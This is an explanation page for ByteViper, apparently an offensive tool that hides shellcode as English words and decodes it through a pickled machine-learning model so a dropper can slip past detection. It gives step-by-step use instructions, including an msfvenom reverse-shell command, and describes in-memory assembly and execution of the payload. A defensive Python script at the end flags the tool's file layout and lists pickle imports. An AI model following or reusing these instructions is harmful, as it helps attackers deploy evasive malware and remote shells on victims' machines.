Source code explanation

The source code is in https://github.com/ghostpepper108/ByteViper/

TLDR: After the AI module generates the payload and the dropper is compiled with that AI-generated payload, the dropper is executed. The dropper connects to the AI module and sends the English words one by one; the pre-trained model in the AI module uses a mathematical function to fetch the payload from the vectors for those English words.

This project consists of the following files, explained below:

  1. payload-generator.py: This is the payload generator created by the Byte Viper AI engine. It converts a raw hex-code payload (for example, one from msfvenom) into its mathematical representation as vectors using the pre-trained machine-learning model. Here are the instructions for using it:

    • Create a working payload. For instance, an msfvenom payload would be

    msfvenom -p x64 --platform windows -p windows/x64/shell_reverse_tcp lhost= lport= -f c

    • You would get something like \

    • Remove all \x and " characters so that you are left with fc4883e4f0e8c000000041514150.... Use this as your input next

    • You will receive the AI-generated payload, which you embed in your code

    • A ".pkl" file that holds the vectors is also created

    • Place this file in the same path as your dropper binary

    • Also place payload.py in the same path as your dropper

  2. payload.py: This Python file goes along with your dropper binary. It contains the code that takes the English words from the dropper and gets the equivalent hex code from the AI module.

  3. ByteViper.cpp: This C file is the dropper file. This is just an example of how the payload is embedded, in a seemingly benign way, using English words. The code also connects to the AI module to get the raw hex code and then assembles it in memory one byte at a time, just before executing the payload. The code can be modified to use many other techniques, including remote code injection.

  4. tasks.json: This is the VS Code config file that I used for compiling the code
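
For triage of the file layout described above (a dropper binary in the same path as payload.py and a .pkl file), here is an added example that is not code from the ByteViper repository: it flags that co-location and lists the globals each .pkl would import, reading the opcodes without unpickling the file. The binary suffix list and the function names are assumptions made for this example.

```python
import pickletools
from pathlib import Path

# Assumption: the dropper is a Windows binary; the page gives no file name for it.
BINARY_SUFFIXES = {".exe", ".dll"}
STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}

def pickle_imports(data):
    """List the module.name globals a pickle would import, without unpickling it."""
    found, pushed, memo = set(), [None, None], {}
    try:
        for op, arg, _pos in pickletools.genops(data):
            if op.name in ("MEMOIZE", "PUT", "BINPUT", "LONG_BINPUT"):
                # These store the top of the stack in the memo and push nothing.
                memo[len(memo) if op.name == "MEMOIZE" else arg] = pushed[-1]
                continue
            if op.name in ("GLOBAL", "INST"):
                found.add(arg.replace(" ", ".", 1))
            elif op.name == "STACK_GLOBAL":
                # Module and name are the two most recently pushed strings.
                found.add(f"{pushed[-2] or '?'}.{pushed[-1] or '?'}")
            if op.name in ("GET", "BINGET", "LONG_BINGET"):
                pushed.append(memo.get(arg))
            else:
                pushed.append(arg if op.name in STRING_OPS else None)
    except Exception:
        found.add("<malformed pickle>")
    return found

def triage_dir(directory):
    """Return a report if a binary sits beside payload.py and a .pkl, else None."""
    d = Path(directory)
    files = [p for p in d.iterdir() if p.is_file()]
    bins = sorted(p.name for p in files if p.suffix.lower() in BINARY_SUFFIXES)
    pkls = sorted(p for p in files if p.suffix.lower() == ".pkl")
    if not (bins and pkls and (d / "payload.py").is_file()):
        return None
    return {"binaries": bins,
            "pickles": {p.name: sorted(pickle_imports(p.read_bytes())) for p in pkls}}
```

The import list shows which library produced the vector file and whether it references anything unexpected, so the file can be assessed before anyone loads it in an analysis environment.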
